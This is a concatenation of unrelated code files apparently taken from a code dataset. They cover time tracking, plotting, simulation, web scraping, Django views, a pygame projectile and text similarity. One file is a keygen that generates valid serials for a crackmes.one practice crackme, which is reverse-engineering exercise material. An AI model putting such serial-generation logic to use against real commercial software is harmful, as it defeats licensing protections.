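 # 'changed' tracks whether any field differs from the cached entry, so the API update below only runs when something was actually modified.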
 # Need to use cached time entry data because API doesn't support getting time entry data by ID\n cached_entry = helpers.get_cached_entry(args.id)\n\n if not cached_entry:\n print('Time entry does not exist or is not cached.')\n return\n\n # Change TimeEntrySummaryDto to work as UpdateTimeEntryRequest format (see Clockify API documentation)\n entry = {}\n entry['id'] = cached_entry['id']\n entry['description'] = cached_entry['description']\n entry['start'] = cached_entry['timeInterval']['start']\n entry['end'] = cached_entry['timeInterval']['end']\n entry['projectId'] = cached_entry['project']['id']\n entry['billable'] = cached_entry['billable']\n entry['tagIds'] = []\n\n if 'task' in cached_entry and cached_entry['task']:\n entry['taskId'] = cached_entry['task']['id']\n\n if 'tags' in cached_entry and cached_entry['tags']:\n for tag in cached_entry['tags']:\n entry['tagIds'].append(tag['id'])\n\n # Update description, if necessary\n if args.comments and args.comments != entry['description']:\n changed = True\n\n entry['description'] = args.comments\n cached_entry['description'] = args.comments\n print('Changing comments to: ' + args.comments)\n\n # Establish entry hours\n current_hours = helpers.iso_duration_to_hours(cached_entry['timeInterval']['duration'])\n\n if args.hours and (args.hours[:1] == '+' or args.hours[:1] == '-' or current_hours != float(args.hours)):\n changed = True\n\n original_hours = current_hours\n\n if args.hours[:1] == '+':\n current_hours += float(args.hours[1:])\n elif args.hours[:1] == '-':\n current_hours -= float(args.hours[1:])\n else:\n current_hours = float(args.hours)\n\n print('Changing hours from ' + str(original_hours) + ' to: ' + str(current_hours))\n\n # Change UTC start date/time, if necessary\n if args.date:\n # Convert entry date to simple string in local timezone\n original_date_localized = dateutil.parser.parse(entry['start']).astimezone(app_data['clockify'].tz)\n original_date = original_date_localized.strftime('%Y-%m-%d')\n\n if original_date != args.date:\n changed = True\n\n # Convert new date to UTC ISO 8601\n entry['start'] = app_data['clockify'].local_date_string_to_utc_iso_8601(args.date)\n cached_entry['timeInterval']['start'] = entry['start']\n\n print('Changing activities from ' + original_date + ' to ' + args.date)\n\n # Convert UTC start date/time to localized datetime and use it to calculate ISO 8601 end date/time\n start_datetime = dateutil.parser.parse(entry['start'])\n entry['end'] = app_data['clockify'].add_hours_to_localized_datetime_and_convert_to_iso_8601(start_datetime, current_hours)\n\n cached_entry['timeInterval']['duration'] = isodate.duration_isoformat(dateutil.parser.parse(entry['end']) - dateutil.parser.parse(entry['start']))\n cached_entry['timeInterval']['end'] = entry['end']\n\n if changed:\n # Perform update via API\n response = app_data['clockify'].update_entry(entry)\n\n if response.status_code == 200:\n helpers.write_cache_entry(cached_entry)\n print(helpers.entry_bullet_point(cached_entry))\n print('Time entry updated.')\n else:\n response_data = response.json()\n print('Unexpected response status code: ' + str(response.status_code))\n if 'message' in response_data:\n print('Message: ' + response_data['message'])\n else:\n print('No update as no change requested.')\n\n\ndef delete_entry(args, config, app_data):\n app_data['clockify'].delete_entry(args.id)\n print('Time entry deleted.')\n\n\ndef list_workspaces(args, config, app_data):\n for workspace in app_data['clockify'].workspaces():\n print('* {} [{}]'.format(workspace['name'], workspace['id']))\n\n\ndef list_projects(args, config, 
app_data):\n for project in app_data['clockify'].projects():\n print('* {} [{}]'.format(project['name'].encode('utf-8'), project['id']))\n","sub_path":"commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"503733618","text":"import os\nimport logging\nfrom flask import Flask\nfrom pymacaron import API, letsgo\n\nlog = logging.getLogger(__name__)\n\napp = Flask(__name__)\n\n\ndef my_error_reporter(title, msg):\n \"\"\"This method receives all errors that should be reported up to site admins\"\"\"\n log.info(\"Helloworld error reporter received [%s] [%s]\" % (title, msg))\n\n\ndef start(port, debug):\n here = os.path.dirname(os.path.realpath(__file__))\n path_apis = os.path.join(here, \"apis\")\n\n api = API(\n app,\n port=port,\n debug=debug,\n error_reporter=my_error_reporter,\n )\n api.load_apis(path_apis)\n api.start(serve=\"helloworld\")\n\n\nletsgo(__name__, callback=start)\n","sub_path":"digram-backend/diagflow/src/com/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"24766449","text":"from plotly.subplots import make_subplots\r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nathletes_df = pd.read_excel(os.path.join('datasets', 'olympics2021', 'Athletes.xlsx'), engine='openpyxl')\r\nmedals_df = pd.read_excel(os.path.join('datasets', 'olympics2021', 'Medals.xlsx'), engine='openpyxl')\r\n\r\nathletes_group = athletes_df.groupby(['NOC', 'Discipline']).count().reset_index()\r\nsports_group = athletes_df.groupby('Discipline').count().reset_index()\r\nmedals_group = medals_df.groupby(['Team/NOC', 'Gold', 'Silver', 'Bronze', 'Total']).count().reset_index()\r\n\r\naverage_medals_won = sum(medals_group['Total']) // len(medals_group['Team/NOC'])\r\naverage_athletes_sport = sum(sports_group['Name']) // len(sports_group['Discipline'])\r\n\r\n\r\nfig = make_subplots(\r\n rows = 8,\r\n cols = 2,\r\n specs = [[{'type': 'bar', 'colspan': 2, 'rowspan': 2}, None],\r\n [{'type': 'scatter', 'colspan': 2}, None],\r\n [None, None],\r\n [None, None],\r\n [{'type': 'scatter', 'colspan': 2, 'rowspan': 2}, None],\r\n [{'type': 'scatter', 'colspan': 2}, None],\r\n [None, None],\r\n [None, None],])\r\n\r\nfig.add_trace(\r\n go.Bar(x = athletes_group['Discipline'],\r\n y = athletes_group['Name'],\r\n name = 'Country',\r\n marker = {\r\n 'color': 'orange'\r\n },\r\n hovertext = athletes_group['NOC'],\r\n marker_line_width = 0.25,),\r\n row = 1, col = 1)\r\n\r\nfig.add_trace(\r\n go.Scatter(x = athletes_group['Discipline'],\r\n y = [average_athletes_sport] * len(athletes_group['Discipline']),\r\n name = 'Average Athlete by Sport',\r\n mode = 'lines',\r\n marker = {\r\n 'color': 'green'\r\n },\r\n opacity = 0.25,\r\n hovertext = 'Average Athletes/Sport'),\r\n row = 1, col = 1\r\n)\r\n\r\nfig.add_trace(\r\n go.Scatter(x = medals_group['Team/NOC'],\r\n y = medals_group['Total'],\r\n name = 'Medals',\r\n mode = 'markers',\r\n marker = {\r\n 'color': 'red',\r\n },\r\n hovertext = medals_group['Total'],),\r\n row = 5, col = 1) \r\n\r\nfig.add_trace(\r\n go.Scatter(x = medals_group['Team/NOC'],\r\n y = [average_medals_won] * len(medals_group['Team/NOC']),\r\n mode = 'lines',\r\n name = 'Average Medals Won',\r\n marker = {\r\n 'color': 'blue',\r\n },\r\n opacity = 0.25,\r\n hovertext = 'Average Medals Won'),\r\n row = 5, col = 1\r\n 
)\r\n\r\nfig.update_yaxes(title_text = 'No. of Athletes', row = 1, col = 1)\r\nfig.update_yaxes(title_text = 'Total Medals', row = 5, col = 1)\r\n\r\nfig.show()\r\n","sub_path":"olympicsplot.py","file_name":"olympicsplot.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"272752677","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 20 15:10:44 2018\n\n@author: Jarnd\n\"\"\"\nimport time\nimport sys\nsys.path.append('../Circuits/BitwiseFTSWAP')\nsys.path.append('../Functions')\n\nfrom FTSWAP import nq, gates, p_s, p_m\n\nimport simulationfunctions as smf\n\nimport itertools as itt\n\n\nPs = ['X','Y','Z']\nMs = ['X','Y','Z','I']\nk = 0\nstart_time = time.time()\nfor iteration in itt.product(Ps, repeat = nq):\n if iteration == ('I',)*nq: continue\n for phase_iteration in itt.product([0,2], repeat = nq):\n for meas_iteration in itt.product(Ms, repeat = nq):\n #print('initial state',list(iteration))\n measurements = smf.run_one_round(nq,iteration,phase_iteration,gates,p_m,p_s,list(meas_iteration))\n k+=1\n \n\nstop_time = time.time()\nprint(stop_time - start_time)","sub_path":"Simulating/tomo_FTSWAP.py","file_name":"tomo_FTSWAP.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127974230","text":"from numpy import arange, zeros, ones\nfrom pylab import plot, show, ylim\n\nG = 6.674e-11\nMe = 5.974e24\nMm = 7.348e22\n\nR = 3.844e8\n\nw = 2.662e-6\n\nk = w/G/Me\ndistance = arange(1e6, 5e8, 1.01e5)\n\nf = zeros(len(distance))\nx_axis = zeros(len(distance))\nf1 = ones(len(distance))\nf1 = f1 * R\n\nfor i in range(len(distance)):\n r = distance[i]\n f[i] = G*Me/r/r - G*Mm/(R-r)/(R-r) - w*w*r\n\nplot(distance,f)\nplot(distance,x_axis)\nplot(f1,f)\n\nylim(-0.1,0.20)\n","sub_path":"LP.py","file_name":"LP.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"192624635","text":"# common installs\n# pip install bs4\n\n# common imports\nfrom bs4 import BeautifulSoup, Comment\nimport requests\nfrom googlesearch import search\nimport html2text\n\n# get text content\ndef get_text(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'lxml')\n all_text = ''\n for text in soup.body.find_all(string=True):\n if text.parent.name not in ['script', 'meta', 'style'] and not isinstance(text, Comment) and text.strip() != '':\n #print(text.strip(), '-----------------')\n all_text += ' '+text.strip()\n return all_text\n\ndef google_query(query):\n for res in search(query, num=5, stop=5):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0\",\n \"Accept\": \"text/html,application/xhtml+xml, application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\":\"gzip, deflate\", \"DNT\": \"1\",\n \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\n r = requests.get(res, headers=headers)\n h = html2text.HTML2Text()\n h.ignore_links=True\n doc = h.handle(r.text)\n print(doc)\n","sub_path":"src/web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"614628802","text":"from django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, 
InvalidPage\nfrom django.db.models import CharField\nfrom django.db.models import Q\nfrom django.http import Http404, HttpResponse\nfrom django.shortcuts import render_to_response, redirect\nfrom django.template import RequestContext\n\nfrom .excel_utils import WriteToExcel\nfrom .models import *\n\n\n# Create your views here.\n\n@login_required\ndef index(request):\n if not request.user.is_authenticated():\n return redirect('/login/')\n licenses_list = LicenseInfo.objects.all()\n paginator = Paginator(licenses_list, 10)\n\n try:\n page = int(request.GET.get('page', '1'))\n except:\n page = 1\n\n try:\n licenses = paginator.page(page)\n except(EmptyPage, InvalidPage):\n licenses = paginator.page(paginator.num_pages)\n\n return render_to_response(\"index.html\", {\"licenses\": licenses, \"licenses_list\": licenses_list},\n context_instance=RequestContext(request))\n\n\ndef act(request):\n licenses = LicenseInfo.objects.all()\n user = request.user\n if request.method == 'POST':\n to_print = request.POST.getlist('to_print')\n licenses = LicenseInfo.objects.filter(id__in=to_print)\n response = HttpResponse(content_type='application/vnd.ms-excel')\n response['Content-Disposition'] = 'attachment; filename=export.xlsx'\n xlsx_data = WriteToExcel(licenses, user)\n response.write(xlsx_data)\n return response\n return render_to_response(\"act.html\", {\"licenses\": licenses},\n context_instance=RequestContext(request))\n\n\ndef add(request):\n form = LicenseInfoForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n form.save()\n return redirect('/')\n\n return render_to_response(\"add_license.html\", {\"form\": form},\n context_instance=RequestContext(request))\n\n\ndef search(request):\n error = False\n if 'q' in request.GET and request.GET['q'] is not None:\n error = False\n q = request.GET['q']\n fields = [f for f in LicenseInfo._meta.fields if isinstance(f, CharField)]\n queries = [Q(**{f.name + '__contains': q}) for f in fields]\n\n qs = Q()\n for query in queries:\n qs = qs | query\n\n licenses = LicenseInfo.objects.filter(qs)\n return render_to_response(\"search_results.html\", {'licenses': licenses, 'query': q},\n context_instance=RequestContext(request))\n\n return render_to_response(\"search.html\", {'error': error},\n context_instance=RequestContext(request))\n\n\ndef edit(request, rec_id):\n try:\n rec_id = int(rec_id)\n except ValueError:\n raise Http404()\n\n license_rec = LicenseInfo.objects.get(id=rec_id)\n\n form = LicenseInfoForm(instance=license_rec)\n if request.POST:\n before_edit = LicenseInfo.objects.get(id=rec_id)\n form = LicenseInfoForm(request.POST, request.FILES, instance=before_edit)\n if form.is_valid():\n j = form.save(commit=False)\n j.save()\n return redirect('/')\n else:\n form = LicenseInfoForm(instance=license_rec)\n\n return render_to_response(\"edit.html\", {\"form\": form},\n context_instance=RequestContext(request))\n\n\ndef delete(request, rec_id):\n try:\n rec_id = int(rec_id)\n except ValueError:\n raise Http404()\n\n license_rec = LicenseInfo.objects.get(id=rec_id)\n if request.POST:\n license_rec.delete()\n return redirect(\"/\")\n\n return render_to_response(\"delete.html\", {\"license_rec\": license_rec},\n context_instance=RequestContext(request))\n","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"580010916","text":"import pygame\nimport math\n\nfrom 
effects.Explosion import Explosion\n \nclass PlayerProjectile(pygame.sprite.Sprite):\n \"\"\"This class is base class for all bullet projectiles by the player.\n\n \"\"\"\n def __init__(self, game, player, pos):\n \"\"\"__init__ method for PlayerProjectile class\n\n Args:\n game (Integrate.Game): Integrate.Game class object.\n player (Player.Player): Player.Player class object.\n pos (tuple length 2) : position of the player (x,y).\n\n \"\"\"\n self.group = game.all_sprites\n self.layer = 1\n pygame.sprite.Sprite.__init__(self)\n self.group.add(self, layer=self.layer)\n self.player = player\n self.game = game\n self.Blst = []\n self.vel = pygame.math.Vector2(0, 0)\n self.anim_update = 0\n self.current_frame = 0\n self.angle = 0\n self.bulletlst = []\n \n self.state = 'SHOT'\n self.pos = (0,0)\n self.dir = self.player.lastdir # set own direction based on the direction the player sprite is facing\n \n self.image = pygame.transform.rotozoom(self.image, self.game.player.angle3, 1)\n \n position = pygame.mouse.get_pos()\n Bangle = math.degrees(math.atan2(position[1]-(self.game.player.pos.y),position[0]-(self.game.player.pos.x)))\n A = self.game.player.pos.x + math.cos(math.radians(Bangle))*35\n B = self.game.player.pos.y + math.sin(math.radians(Bangle))*35\n self.bulletlst.append([math.atan2(position[1]-(self.game.player.pos.y),position[0]-(self.game.player.pos.x)),A,B])\n self.mask = pygame.mask.from_surface(self.image)\n self.maskbount = self.mask.get_bounding_rects()\n self.rect = self.image.get_rect()\n self.rect.center = self.pos\n self.hit_rect = self.maskbount[0]\n self.hit_rect.center = self.rect.center\n\n\n def collide_hit_rect(self, one, two):\n \"\"\"PlayerProjectile class method to check if two objects are colliding.\n\n \"\"\"\n return one.hit_rect.colliderect(two.hit_rect)\n \n \n def update(self):\n \"\"\"PlayerProjectile class method to update the PlayerProjectile motion of player bullet and its effects.\n\n \"\"\"\n if self.state == 'SHOT':\n # effects of hiting an explotion crate\n hits_walls = pygame.sprite.spritecollide(self, self.game.walls, False, self.collide_hit_rect)\n for wall in hits_walls:\n if wall.image == self.game.imageLoader.solid_img['crate']:\n images = self.game.imageLoader.effects['crate_explosion']\n Explosion(self.game, pygame.math.Vector2(self.pos), images, 80, damage = 0.2,\n sound=self.game.soundLoader.get['explosiveTank'],\n hit_rect=pygame.Rect(images[0].get_rect().inflate(-6, -6)))\n wall.kill()\n\n # change the state to hits wall and later destroy bullet\n if hits_walls:\n self.state = 'HIT_WALL'\n\n # update the bullet velocity and position\n for bullet in self.bulletlst:\n velx=math.cos(bullet[0])*5\n vely=math.sin(bullet[0])*5\n if self.game.player.MoveCheck == True:\n bullet[1]+=velx\n bullet[2]+=vely\n for PlayerProjectile in self.bulletlst:\n self.acc = PlayerProjectile\n \n # cause damage to enemies if bullet hits them\n hits_enemies = pygame.sprite.spritecollide(self, self.game.enemies, False, self.collide_hit_rect)\n # change the state to hit enemies and later destroy bullet\n if hits_enemies:\n for enemy in hits_enemies:\n enemy.hp -= self.damage\n self.state = 'HIT_ENEMY'\n self.enemy = enemy\n\n # updates the position of the bullet.\n self.pos = (self.acc[1], self.acc[2])\n \n else:\n self.destroy()\n \n self.rect.center = self.pos\n self.hit_rect.center = self.rect.center\n \n # animate the motion of bullet\n try: \n self.animate()\n except:\n # has no animation frames\n pass\n \n \n def animate(self):\n \"\"\"PlayerProjectile class 
method to animate the bullet PlayerProjectile.\n\n \"\"\"\n now = pygame.time.get_ticks()\n if now - self.anim_update > self.anim_speed:\n self.anim_update = now\n self.current_frame = (self.current_frame + 1) % len(\n self.image_frames)\n self.image = self.image_frames[self.current_frame]\n \n \n def destroy(self):\n \"\"\"PlayerProjectile class method to destroy the bullet.\n\n \"\"\"\n self.vel *= 0\n self.kill()\n\n \n","sub_path":"bullets/PlayerProjectile.py","file_name":"PlayerProjectile.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"314834241","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 17:23:15 2017\n\n@author: Radik\n\"\"\"\n\nimport urllib.request\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = 'http://www.fsin-atlas.ru/catalog/region/cheliabinsk/'\n \nsock = urllib.request.urlopen(url)\nbsObj = BeautifulSoup(sock.read(),\"html.parser\")\n\nminiitems = bsObj.findAll(\"div\",{\"class\":\"item small \"})\nminiitems2 = bsObj.findAll(\"div\",{\"class\":\"item small odd\"})\nc = len(miniitems)+len(miniitems2)\nfa = open(\"sizo.json\", \"w\", encoding='utf-8')\nfa.write('{\"total\":\"'+str(c)+'\",\"items\":[') \nfor j in range(0,c):\n firm_name =\"\"\n try:\n firmname = bsObj.findAll(\"div\",{\"class\":\"title\"})\n firm_name=firmname[j].get_text() \n except:\n firm_name=\"\"\n url_name =\"\"\n try:\n urlname = bsObj.findAll(\"a\",{\"class\":\"read_more\"})\n url_name=urlname[j].attrs[\"href\"] \n except:\n url_name=\"\"\n # print (firm_name + \" \"+url_name)\n url2 = 'http://www.fsin-atlas.ru'+url_name\n sock2 = urllib.request.urlopen(url2)\n bsObj2 = BeautifulSoup(sock2.read(),\"html.parser\")\n options = bsObj2.findAll(\"ul\",{\"class\":\"options\"})\n adres =options[0].findAll('li')[3].get_text().replace('\"',\"'\")\n desc = options[0].findAll('li')[4].get_text().replace('\"',\"'\")\n temp =options[0].findAll('li')[5].prettify() \n i = temp.find('Контакты') \n info =''\n contacts = ''\n try:\n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify() \n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify() \n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[6].prettify()\n temp =options[0].findAll('li')[6].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify() \n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[7].prettify()\n \n temp =options[0].findAll('li')[7].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n i = temp.find('И.О. 
начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[8].prettify()\n \n temp =options[0].findAll('li')[8].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[9].prettify()\n \n temp =options[0].findAll('li')[9].prettify() \n i = temp.find('Контакты') \n if i>0:\n contacts = temp.replace('\"',\"'\")\n else:\n i = temp.find('Начальник:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n i = temp.find('И.О. начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n i = temp.find('ИО начальника:')\n if i>0:\n info = temp\n info = info + ' '+options[0].findAll('li')[10].prettify()\n \n except:\n print('-')\n\n maps = bsObj2.findAll(\"div\",{\"class\":\"map\"}) \n yamap = maps[0].prettify().replace('//', 'https://').replace('\"',\"'\")\n #\"geometry\":{\"type\":\"Point\",\"coordinates\":[61.39455,55.16339]},\n jssrc = maps[0].findAll(\"script\",{\"src\":True})\n url3 = 'https:'+jssrc[0]['src']\n sock3 = urllib.request.urlopen(url3).read().decode(\"utf-8\")\n patC= re.compile('\"coordinates\":(.+?)},\"options\"')\n coords = patC.findall(sock3)[0].replace('[',\"\").replace(']','')\n contacts = re.sub(r'<[^>]+>','',contacts)\n contacts = contacts.replace('\\n\\n','\\n')\n contacts = contacts.replace('\\n    ','')\n contacts = contacts.replace('  ',' ')\n contacts = contacts.replace('  ',' ')\n contacts = contacts.replace('  ',' ')\n info = re.sub(r'<[^>]+>','',info)\n info = info.replace('\\n\\n','\\n')\n info = info.replace('\\n    ','')\n info = info.replace('  ',' ')\n info = info.replace('  ',' ')\n info = info.replace('  ',' ')\n if j<(c-1):\n fa.write('{\"fname\":\"'+firm_name+'\",\"adr\":\"'+adres.replace('\\n','')+'\",\"desc\":\"'+desc.replace('\\n','')+'\",\"contacts\":\"'+contacts.replace('\\n','')+'\",\"info\":\"'+info.replace('\"',\"'\").replace('\\n','')+'\",\"coords\":\"'+coords+'\",\"yamap\":\"'+yamap.replace('\\n','')+'\"},') \n else:\n fa.write('{\"fname\":\"'+firm_name+'\",\"adr\":\"'+adres.replace('\\n','')+'\",\"desc\":\"'+desc.replace('\\n','')+'\",\"contacts\":\"'+contacts.replace('\\n','')+'\",\"info\":\"'+info.replace('\"',\"'\").replace('\\n','')+'\",\"coords\":\"'+coords+'\",\"yamap\":\"'+yamap.replace('\\n','')+'\"}') \nfa.write(']}') \nfa.close() \nprint('ok')","sub_path":"BeautifulSoup/sizoparser.py","file_name":"sizoparser.py","file_ext":"py","file_size_in_byte":6647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"150283950","text":"# Crackmes.one\n# Crackme:\n# Level 1\n# https://github.com/JavierYuste/---\nimport argparse\n\nparser=argparse.ArgumentParser(description=\"Keygen\")\nparser.add_argument(\"name\",metavar=\"name\",help=\"The name you wanna type\",type=str)\n\nif __name__ == '__main__':\n args=parser.parse_args()\n\n # Loop\n var13C = 0\n var29C = 0\n i = 0\n while var29C < len(args.name):\n var13C = var13C + ord(args.name[i:i+1])\n var29C = var29C + 1\n i = i + 1\n\n print('Valid serials for ' + args.name)\n # First serial = NAME.length + 0x6E + NAME.substr(0,1) + var13C\n print('[+] First solution: ' + str(len(args.name)) + str(int(0x6E)) + str(ord(args.name[:1])) + str(var13C))\n\n # Second serial = NAME.substr + 0x5F + var13C + NAME.\n print('[+] Second solution: ' + str(ord(args.name[:1])) + str(int(0x5F)) + str(var13C) + str(len(args.name)))\n\n # Third serial = var13C + 0x55 + NAME.length + NAME.substr\n print('[+] Third solution: ' + str(var13C) + str(int(0x55)) + str(len(args.name)) + str(ord(args.name[:1])))\n","sub_path":"Crackmes_one/Level 1/simpledatas_keygenme_1/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"640798703","text":"import numpy as np\nimport pandas as pd\nfrom collections import Counter\n\n#Reading .txt file\ndef txt(filename):\n with open(filename,mode='rt') as file:\n return file.read()\n\nd1=txt(\"./stories/bbc-khashoggi.txt\")\nd2=txt(\"./stories/fox-khashoggi.txt\")\nd3=txt(\"./stories/cnn-khashoggi.txt\")\nd4=txt(\"./stories/breitbart-khashoggi.txt\")\nd5=txt(\"./stories/aljazeera-khashoggi.txt\")\n\n#Reading the stop_words CSV and converting it into a list\nstopwords = pd.read_csv('stop_words.csv')\nsw_list = list(stopwords['word'].values)\n\ndef tokenize(text=None):\n '''\n Reads the text stored in respective variables and performs a text\n cleaning exercise\n\n Arguments:\n text: the text from the article in str format\n\n Returns:\n A list in which\n -each word is a separate element in a list\n -each word is in lower case\n -each word which has a \".\", \",\", \"\"\", \"\\'s\", \"-\", \"(\", \")\", \"?\", \"$\", \"£\",\n \"bn\", \"!\", \"’s\", \"”\", \":\", \"“\", \"—\", \"[\", \"]\" is replaced by an empty space\n -each word having \"killing\" and \"killed\" is replaced with \"kill\"\n -each word having \"admitting\" and \"admitted\" is replaced with \"admit\"\n -removes word which has an integer in it\n\n Raises:\n No output errors built in to function.\n
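 Example (an illustrative sketch; the exact output depends on stop_words.csv --\n here 'the', 'was' and 'said' are assumed to be stop words):\n tokenize('The killing was admitted, 2 officials said.')\n # -> ['kill', 'admit', 'officials']\n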
'''\n text = text.lower()\n replace=['.',',','\"',\"\\'s\",\"-\",\"(\",\")\",\"?\",\"$\",\"£\",\"bn\",\"!\",\"’s\",\"”\",\":\",\"“\",\"—\",\"[\",\"]\"]\n #Loop logic: courtesy Zach\n for i in replace:\n text=text.replace(i,'')\n replace_kill=[\"killing\",\"killed\"]\n for j in replace_kill:\n text=text.replace(j,'kill')\n replace_admit=[\"admitting\",\"admitted\"]\n for k in replace_admit:\n text=text.replace(k,'admit')\n text_list = text.split()\n text_list2 = [word for word in text_list if word not in sw_list]\n text_list3 = [word for word in text_list2 if not word.isdigit()]\n return text_list3\n ##Lily: I am actually not sure why you had the for loops\n ##to replace killing, admitting, and k. I think the text_list2 should\n ##do the work\n\ndef convert_tokens_to_entry(tokens):\n '''\n Converts tokens into count entries for a document term matrix.\n '''\n d = {key:[value] for key,value in Counter(tokens).items()}\n return pd.DataFrame(d)\n\ndef gen_DTM(texts=None):\n '''\n Generate a document term matrix\n '''\n DTM = pd.DataFrame()\n for text in texts:\n tokens = tokenize(text)\n entry = convert_tokens_to_entry(tokens)\n\n # Append (row bind) the current entry onto the existing data frame\n DTM = DTM.append(pd.DataFrame(entry),ignore_index=True,sort=True)\n\n # Fill in any missing values with 0s (i.e. when a word is in one text but not another)\n DTM.fillna(0, inplace=True)\n return DTM\n\n#Consolidating all results in one variable\ntest = gen_DTM([d1,d2,d3,d4,d5])\n\n#Converting above test data into list form\nall_docs=[i for i in test.values]\n\n#Cosine logic\ndef cosine(a,b):\n cos = np.dot(a,b)/(np.sqrt(np.dot(a,a)) * np.sqrt(np.dot(b,b)) )\n return cos\n\n#Creating a matrix of 5x5 with zeroes in it\nmat = np.zeros((5,5))\n\nfor i in range(len(all_docs)):\n for j in range(len(all_docs)):\n mat[i][j]=round(cosine(all_docs[i],all_docs[j]),3)\n\nlabels=[\"BBC\",\"Fox\",\"CNN\",\"Breitbart\",\"Aljazeera\"]\n\nfinal=pd.DataFrame(mat,labels,labels)\nprint(final)\n\n#Most similarity in news is between Fox and Al-Jazeera news\n#Least similarity in news is between CNN & Breitbart\n","sub_path":"hs957_sharda.py","file_name":"hs957_sharda.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"376219975","text":"from django.conf.urls import patterns, url\n\nfrom custom.ilsgateway.slab.views import SLABConfigurationView, SLABEditLocationView\nfrom custom.ilsgateway.views import SupervisionDocumentListView, SupervisionDocumentDeleteView, \\\n SupervisionDocumentView, ReportRunListView, ReportRunDeleteView, DashboardPageRedirect, GlobalStats\nfrom custom.ilsgateway.views import ILSConfigView\n\nurlpatterns = patterns('custom.ilsgateway.views',\n url(r'^ils_dashboard_report/$', DashboardPageRedirect.as_view(), name='ils_dashboard_report'),\n url(r'^ils_config/$', ILSConfigView.as_view(), name=ILSConfigView.urlname),\n url(r'^global_stats/$', GlobalStats.as_view(), name=GlobalStats.urlname),\n url(r'^run_reports/$', 'run_warehouse_runner', name='run_reports'),\n url(r'^end_report_run/$', 'end_report_run', name='end_report_run'),\n url(r'^supervision/$', SupervisionDocumentListView.as_view(), name=SupervisionDocumentListView.urlname),\n url(r'^delete_supervision_document/(?P\\d+)/$', SupervisionDocumentDeleteView.as_view(),\n name='delete_supervision_document'),\n url(r'^supervision/(?P\\d+)/$', SupervisionDocumentView.as_view(), name='supervision_document'),\n url(r'^save_ils_note/$', 'save_ils_note', 
